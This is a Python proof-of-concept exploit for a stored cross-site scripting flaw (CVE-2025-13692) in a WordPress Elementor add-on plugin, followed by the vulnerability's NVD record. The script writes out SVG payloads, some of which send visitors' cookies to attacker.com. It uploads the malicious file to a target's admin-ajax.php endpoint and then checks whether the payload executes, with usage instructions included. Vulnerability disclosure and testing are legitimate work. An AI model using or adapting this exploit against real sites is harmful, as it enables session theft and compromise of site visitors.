CVE-2025-13692

# CVE-2025-13692 PoC - SVG Upload Stored XSS # Affected: Unlimited Elements For Elementor plugin <= 2.0 import requests import sys def create_malicious_svg(): """Generate malicious SVG file with XSS payload""" # Basic XSS payload for testing xss_payload = '<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)">' # More advanced payload for cookie theft advanced_payload = '''<svg xmlns="http://www.w3.org/2000/svg"> <script>document.location='https://attacker.com/steal?c='+document.cookie</script> </svg>''' # Event handler based payload event_payload = '''<svg xmlns="http://www.w3.org/2000/svg"> <rect width="100" height="100" onmouseover="fetch('https://attacker.com/log?data='+btoa(document.cookie))"/> </svg>''' return advanced_payload def upload_svg(target_url, form_id=None): """ Upload malicious SVG via the plugin's file upload form Note: Requires premium version to create upload form first """ svg_content = create_malicious_svg() files = { 'file': ('malicious.svg', svg_content, 'image/svg+xml') } data = {} if form_id: data['form_id'] = form_id try: response = requests.post(target_url, files=files, data=data, timeout=10) if response.status_code == 200: print('[+] SVG file uploaded successfully') print(f'[+] Response: {response.text}') return True else: print(f'[-] Upload failed with status: {response.status_code}') return False except requests.exceptions.RequestException as e: print(f'[-] Request error: {e}') return False def verify_xss(svg_url): """Verify the XSS payload is executable""" try: response = requests.get(svg_url, timeout=10) if 'script' in response.text.lower() or 'onload' in response.text: print('[!] XSS payload detected in response - vulnerability confirmed') return True except requests.exceptions.RequestException as e: print(f'[-] Verification error: {e}') return False if __name__ == '__main__': if len(sys.argv) < 3: print(f'Usage: python {sys.argv[0]} <upload_url> <svg_url>') print('Example:') print(f' python {sys.argv[0]} http://target.com/wp-admin/admin-ajax.php http://target.com/wp-content/uploads/svg/malicious.svg') sys.exit(1) upload_url = sys.argv[1] svg_url = sys.argv[2] print('[*] CVE-2025-13692 PoC - Unlimited Elements For Elementor SVG XSS') print(f'[*] Target: {upload_url}') if upload_svg(upload_url): print('[*] Verifying XSS execution...') verify_xss(svg_url)

{"cve": {"id": "CVE-2025-13692", "sourceIdentifier": "[email protected]", "published": "2025-11-27T14:15:51.853", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Unlimited Elements For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. A form with a file upload field must be created with the premium version of the plugin in order to exploit the vulnerability. However, once the form exists, the vulnerability is exploitable even if the premium version is deactivated and/or uninstalled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/unlimited-elements-for-elementor/trunk/inc_php/unitecreator_filters_process.class.php#L3279", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/unlimited-elements-for-elementor/trunk/inc_php/unitecreator_form.class.php#L1952", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/unlimited-elements-for-elementor/trunk/inc_php/unitecreator_form.class.php#L1960", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/unlimited-elements-for-elementor/trunk/inc_php/unitecreator_form.class.php#L598", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3403331/", "source": "[email protected]"}, {"url": "https://unlimited-elements.com/change-log/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ae603b13-dc09-4f83-8741-943d62615b3c?source=cve", "source": "[email protected]"}]}}